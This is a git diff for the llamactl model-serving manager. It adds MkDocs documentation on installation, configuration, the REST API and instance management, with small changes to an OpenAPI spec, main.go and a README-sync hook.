schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse vllm serve command
tags:
- backends
/instances:
get:
description: Returns a list of all instances managed by the server
@@ -694,57 +545,6 @@ paths:
summary: Stop a running instance
tags:
- instances
/server/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- server
/server/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- server
/server/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- server
/v1/:
post:
consumes:
@@ -756,7 +556,7 @@ paths:
"200":
description: OpenAI response
"400":
description: Invalid request body or model name
description: Invalid request body or instance name
schema:
type: string
"500":

View File

@@ -58,7 +58,7 @@ func main() {
}
// Initialize the instance manager
instanceManager := manager.NewInstanceManager(cfg.Instances)
instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
// Create a new handler with the instance manager
handler := server.NewHandler(instanceManager, cfg)

5
docs-requirements.txt Normal file
View File

@@ -0,0 +1,5 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4
mike==2.0.0

View File

@@ -0,0 +1,238 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Backend Configuration
```yaml
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false # Enable Docker runtime (default: false)
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
# MLX does not support Docker
```
**Backend Configuration Fields:**
- `command`: Executable name/path for the backend
- `args`: Default arguments prepended to all instances
- `environment`: Environment variables for the backend process (optional)
- `docker`: Docker-specific configuration (optional)
- `enabled`: Boolean flag to enable Docker runtime
- `image`: Docker image to use
- `args`: Additional arguments passed to `docker run`
- `environment`: Environment variables for the container (optional)
**Environment Variables:**
**LlamaCpp Backend:**
- `LLAMACTL_LLAMACPP_COMMAND` - LlamaCpp executable command
- `LLAMACTL_LLAMACPP_ARGS` - Space-separated default arguments
- `LLAMACTL_LLAMACPP_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_LLAMACPP_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**VLLM Backend:**
- `LLAMACTL_VLLM_COMMAND` - VLLM executable command
- `LLAMACTL_VLLM_ARGS` - Space-separated default arguments
- `LLAMACTL_VLLM_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_VLLM_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**MLX Backend:**
- `LLAMACTL_MLX_COMMAND` - MLX executable command
- `LLAMACTL_MLX_ARGS` - Space-separated default arguments
- `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.

View File

@@ -0,0 +1,105 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# For production deployments, consider container-based installation
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -0,0 +1,190 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or identifier for your chosen backend
- **Additional Options**: Backend-specific parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
}
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
}
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
}
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown.

After

Width:  |  Height:  |  Size: 69 KiB

BIN
docs/images/dashboard.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 47 KiB

34
docs/index.md Normal file
View File

@@ -0,0 +1,34 @@
# Llamactl Documentation
Welcome to the Llamactl documentation!
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
**{{HEADLINE}}**
## Features
{{FEATURES}}
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

62
docs/readme_sync.py Normal file
View File

@@ -0,0 +1,62 @@
"""
MkDocs hook to sync content from README.md to docs/index.md
"""
import re
import os
def on_page_markdown(markdown, page, config, **kwargs):
"""Process markdown content before rendering"""
# Only process the index.md file
if page.file.src_path != 'index.md':
return markdown
# Get the path to README.md (relative to mkdocs.yml)
readme_path = os.path.join(os.path.dirname(config['config_file_path']), 'README.md')
if not os.path.exists(readme_path):
print(f"Warning: README.md not found at {readme_path}")
return markdown
try:
with open(readme_path, 'r', encoding='utf-8') as f:
readme_content = f.read()
except Exception as e:
print(f"Error reading README.md: {e}")
return markdown
# Extract headline (the text in bold after the title)
headline_match = re.search(r'\*\*(.*?)\*\*', readme_content)
headline = headline_match.group(1) if headline_match else 'Management server for llama.cpp and MLX instances'
# Extract features section - everything between ## Features and the next ## heading
features_match = re.search(r'## Features\n(.*?)(?=\n## |\Z)', readme_content, re.DOTALL)
if features_match:
features_content = features_match.group(1).strip()
# Just add line breaks at the end of each line for proper MkDocs rendering
features_with_breaks = add_line_breaks(features_content)
else:
features_with_breaks = "Features content not found in README.md"
# Replace placeholders in the markdown
markdown = markdown.replace('{{HEADLINE}}', headline)
markdown = markdown.replace('{{FEATURES}}', features_with_breaks)
# Fix image paths: convert docs/images/ to images/ for MkDocs
markdown = re.sub(r'docs/images/', 'images/', markdown)
return markdown
def add_line_breaks(content):
"""Add two spaces at the end of each line for proper MkDocs line breaks"""
lines = content.split('\n')
processed_lines = []
for line in lines:
if line.strip(): # Only add spaces to non-empty lines
processed_lines.append(line.rstrip() + ' ')
else:
processed_lines.append(line)
return '\n'.join(processed_lines)

View File

@@ -0,0 +1,527 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. Common fields include:
- `backend_type`: Backend type (`llama_cpp`, `mlx_lm`, or `vllm`)
- `backend_options`: Backend-specific configuration
- `auto_restart`: Enable automatic restart on failure
- `max_restarts`: Maximum restart attempts
- `restart_delay`: Delay between restarts in seconds
- `on_demand_start`: Start instance when receiving requests
- `idle_timeout`: Idle timeout in minutes
- `environment`: Environment variables as key-value pairs
See [Managing Instances](managing-instances.md) for complete configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopped",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing instance name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-2-7b.gguf",
"gpu_layers": 32
},
"environment": {
"CUDA_VISIBLE_DEVICES": "0",
"OMP_NUM_THREADS": "8"
}
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Backend-Specific Endpoints
### Parse Commands
Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
#### Parse Llama.cpp Command
Parse a llama-server command string into instance options.
```http
POST /api/v1/backends/llama-cpp/parse-command
```
**Request Body:**
```json
{
"command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
}
```
**Response:**
```json
{
"backend_type": "llama_cpp",
"llama_server_options": {
"model": "/path/to/model.gguf",
"ctx_size": 2048,
"port": 8080
}
}
```
#### Parse MLX-LM Command
Parse an MLX-LM server command string into instance options.
```http
POST /api/v1/backends/mlx/parse-command
```
**Request Body:**
```json
{
"command": "mlx_lm.server --model /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "mlx_lm",
"mlx_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
#### Parse vLLM Command
Parse a vLLM serve command string into instance options.
```http
POST /api/v1/backends/vllm/parse-command
```
**Request Body:**
```json
{
"command": "vllm serve /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "vllm",
"vllm_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
**Error Responses for Parse Commands:**
- `400 Bad Request`: Invalid request body, empty command, or parse error
- `500 Internal Server Error`: Encoding error
## Auto-Generated Documentation
The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -0,0 +1,229 @@
# Managing Instances
Learn how to effectively manage your llama.cpp, MLX, and vLLM instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. **Choose Backend Type**:
- **llama.cpp**: For GGUF models using llama-server
- **MLX**: For MLX-optimized models (macOS only)
- **vLLM**: For distributed serving and high-throughput inference
4. Configure model source:
- **For llama.cpp**: GGUF model path or HuggingFace repo
- **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
- **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
5. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
- **Environment Variables**: Set custom environment variables for the instance process
6. Configure backend-specific options:
- **llama.cpp**: Threads, context size, GPU layers, port, etc.
- **MLX**: Temperature, top-p, adapter path, Python environment, etc.
- **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
7. Click **"Create"** to save the instance
### Via API
```bash
# Create llama.cpp instance with local model file
curl -X POST http://localhost:8080/api/instances/my-llama-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096,
"gpu_layers": 32
}
}'
# Create MLX instance (macOS only)
curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"top_p": 0.9,
"max_tokens": 2048
},
"auto_restart": true,
"max_restarts": 3
}'
# Create vLLM instance
curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
},
"auto_restart": true,
"on_demand_start": true,
"environment": {
"CUDA_VISIBLE_DEVICES": "0,1",
"NCCL_DEBUG": "INFO",
"PYTHONPATH": "/custom/path"
}
}'
# Create llama.cpp instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
}
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
